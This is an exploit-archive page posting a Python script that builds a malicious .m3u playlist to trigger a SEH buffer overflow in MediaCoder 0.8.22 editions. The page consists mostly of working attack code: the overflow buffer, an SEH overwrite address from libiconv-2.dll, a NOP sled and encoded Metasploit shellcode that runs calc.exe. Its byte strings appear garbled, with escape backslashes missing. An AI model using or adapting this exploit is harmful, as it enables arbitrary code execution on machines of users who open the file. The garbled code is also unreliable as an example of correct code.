Home / exploits Mediacoder .m3u SEH Buffer Overflow
Posted on 22 June 2013
#!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:m3u [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "x41" * 845 nseh = "xEBx06xFFxFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b 'x00x0ax0dx5c' -t c shell= ("xbfx8exa0x35xacxdaxdaxd9x74x24xf4x5bx2bxc9xb1" "x33x83xc3x04x31x7bx0ex03xf5xaexd7x59xf5x47x9e" "xa2x05x98xc1x2bxe0xa9xd3x48x61x9bxe3x1bx27x10" "x8fx4exd3xa3xfdx46xd4x04x4bxb1xdbx95x7dx7dxb7" "x56x1fx01xc5x8axffx38x06xdfxfex7dx7ax10x52xd5" "xf1x83x43x52x47x18x65xb4xccx20x1dxb1x12xd4x97" "xb8x42x45xa3xf3x7axedxebx23x7bx22xe8x18x32x4f" "xdbxebxc5x99x15x13xf4xe5xfax2ax39xe8x03x6axfd" "x13x76x80xfexaex81x53x7dx75x07x46x25xfexbfxa2" "xd4xd3x26x20xdax98x2dx6exfex1fxe1x04xfax94x04" "xcbx8bxefx22xcfxd0xb4x4bx56xbcx1bx73x88x18xc3" "xd1xc2x8ax10x63x89xc0xe7xe1xb7xadxe8xf9xb7x9d" "x80xc8x3cx72xd6xd4x96x37x28x9fxbbx11xa1x46x2e" "x20xacx78x84x66xc9xfax2dx16x2exe2x47x13x6axa4" "xb4x69xe3x41xbbxdex04x40xd8x81x96x08x31x24x1f" "xaax4d") exploit = buffer + nseh + seh + nops + shell try: rst= open("All-MediaCoder.m3u",'w') rst.write(exploit) rst.close() raw_input(" Exploit file created! ") except: print "Error"
